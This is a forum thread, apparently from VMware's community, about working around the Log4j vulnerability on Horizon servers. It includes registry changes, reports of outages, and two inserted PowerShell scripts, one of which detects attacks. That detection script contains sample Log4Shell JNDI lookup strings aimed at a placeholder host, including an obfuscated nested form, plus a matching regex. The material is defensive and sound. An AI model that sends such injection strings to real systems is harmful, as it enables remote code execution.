There is nothing mentioned about the above product. Does this product also need a workaround for the vulnerability?
Hey, hope you are doing well.
Wasn't Horizon Security Server replaced with Unified Access Gateway appliance?
I'm fine, thanks. You are correct, but we are in the middle of the migration process. And in version 7.0 there is a specific security role.
Hi, please go here https://www.vmware.com/security/advisories/VMSA-2021-0028.html for the latest information on this issue.
Advisory doesn't specify if Security Servers will need the same patches as the Connection Servers. Anyone know of any additional info regarding the Security Servers?
If you look in the registry as per the workaround, you see only the tunnel key; adjust this one accordingly.
I reviewed the workaround information which guided me to KB87073 for the connection server. I stopped the connection service and performed the three registry changes.
HKLM\Software\VMware, Inc.\VMware\VDM\plugins\wsnm\MessageBusService\Params\JVMOptions
HKLM\Software\VMware, Inc.\VMware VDM\plugins\wsnm\TomcatService\Params\JVMOptions
HKLM\Software\VMware, Inc.\VMware VDM\plugins\wsnm\TunnelService\Params\JVMOptions
To each, I appended a single space character followed by this text: -Dlog4j2.formatMsgNoLookups=true
After doing so and restarting the service, the web portal was no longer accessible, and neither was the admin login. After a restart, the same experience. I backed out the three changes, and the portal and admin login became available again a short time after the restart.
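One way to apply the same three registry changes in a repeatable way, with each original value saved first so it can be backed out exactly as the poster had to. This is an added example, not code from the thread or from VMware's KB; it assumes it runs elevated on the Connection Server, that the three JvmOptions values are plain REG_SZ strings, and that the service is stopped beforehand as the KB and the post describe (service names are not scripted here because the thread does not name them):

```powershell
# Added example: idempotently append the log4j2 flag to the three JvmOptions
# values named in the thread. Backs up each original value to a timestamped
# file under %TEMP% so the change can be reverted verbatim.
$flag     = '-Dlog4j2.formatMsgNoLookups=true'
$base     = 'HKLM:\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm'
$services = 'MessageBusService', 'TomcatService', 'TunnelService'
$backup   = Join-Path $env:TEMP ('JvmOptions-backup-{0:yyyyMMdd-HHmmss}.txt' -f (Get-Date))

foreach ($svc in $services) {
    $key = Join-Path $base "$svc\Params"
    if (-not (Test-Path $key)) {
        Write-Warning "Missing key: $key"   # e.g. a Security Server may only have TunnelService
        continue
    }
    $current = (Get-ItemProperty -Path $key -Name JvmOptions -ErrorAction SilentlyContinue).JvmOptions
    if ($null -eq $current) {
        Write-Warning "No JvmOptions value under $key"
        continue
    }
    # Record the exact original before touching it.
    "$key`tJvmOptions`t$current" | Add-Content -Path $backup

    # Do nothing if the flag is already present (safe to re-run).
    if (($current -split '\s+') -contains $flag) {
        Write-Host "$svc already has $flag"
        continue
    }
    # Single space separator, as the workaround text describes.
    $new = $current.TrimEnd() + ' ' + $flag
    Set-ItemProperty -Path $key -Name JvmOptions -Value $new
    Write-Host "$svc JvmOptions updated"
}
Write-Host "Original values saved to $backup"

# Verification: print the resulting values for all three services.
foreach ($svc in $services) {
    $key = Join-Path $base "$svc\Params"
    if (Test-Path $key) {
        [pscustomobject]@{ Service = $svc; JvmOptions = (Get-ItemProperty -Path $key).JvmOptions }
    }
}
```

The backup file is the important part: if the portal stops responding after the change, as reported above, `Set-ItemProperty` with the saved string restores the previous state without guessing at what the value looked like.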
Analysis:
Horizon 8 versions 2111, 2106, 2103, 2012, 2006
Horizon 7 versions 7.13.1, 7.13.0, 7.12.0, 7.10.3
So we have to upgrade to 7.10.3 and then apply the workaround fix with the registry.
The Unified Access Gateway will not help you in the first place, because it will forward all requests to the internal veeam connection server, and this one will execute and download the payloads.
With the help of vRI we found the queries and have decoded the payload. We were lucky, because the code only works on a Linux and not a Windows server, because they call bash and sh as the interpreter. We have curl and wget on Windows on a regular basis 😞
We were scanned first on 12/11 in the morning hours and patched on 12/12 in the evening. A couple of tries are recorded in that period.
Regards,
Joerg
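The post above describes hunting for the scanning attempts in the request logs. The following is an added example, not code from the thread or from any VMware tool, showing the kind of log search a defender would run: it flags lines containing a log4j lookup expression, including the nested form that hides the literal string. The log lines are constructed here for illustration, with a placeholder host; point `Get-Content` at your own Connection Server or UAG logs instead.

```powershell
# Added example: find log lines carrying a log4j lookup expression.
# Sample lines are constructed; EXAMPLE-HOST is a placeholder.
$sampleLines = @(
    '10.0.0.5 - - [11/Dec/2021:03:14:07] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:15:22] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://EXAMPLE-HOST/x}"',
    '10.0.0.9 - - [11/Dec/2021:03:16:01] "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:ldap://EXAMPLE-HOST/x}"'
)

# Match either a plain ${jndi... lookup or a ${ nested directly inside another
# lookup, which is how the literal "jndi" is split up to evade simple filters.
$pattern = '\$\{[^}]*(jndi|\$\{)[^}]*'

function Find-Log4jLookup {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match $pattern) {
            [pscustomobject]@{
                Source = ($line -split ' ')[0]   # client IP from the access-log line
                Match  = $Matches[0]
                Line   = $line
            }
        }
    }
}

# Run over the constructed sample; for real logs use:
#   Find-Log4jLookup -Lines (Get-Content 'C:\path\to\access.log')
Find-Log4jLookup -Lines $sampleLines | Format-Table -AutoSize
```

Hits give you the source addresses and timestamps to compare against your patch window, which is exactly the "scanned on 12/11, patched on 12/12" timeline the post reconstructs.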
This is where you can find the latest updates
VMware Security Solutions https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Sorry, too late. I hadn't seen the UAG listed yesterday... and we were scanned and most likely infected earlier. The UAG contains wget and curl.
The listing isn't exactly right and shows "21.x, 20.x, 3.x" for the UAG. The workaround is clearly only for 2009 and up. It's not for 3.5.x, and there is a big warning.
Regards,
Joerg
edit: managed to recover with the proper settings, Horizon runs again.
Changing the JvmOptions regkeys messed up our Connection Server and now nobody can log in!
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\MessageBusService\Params\JvmOptions
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\TomcatService\Params\JvmOptions
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\TunnelService\Params\JvmOptions
thanks!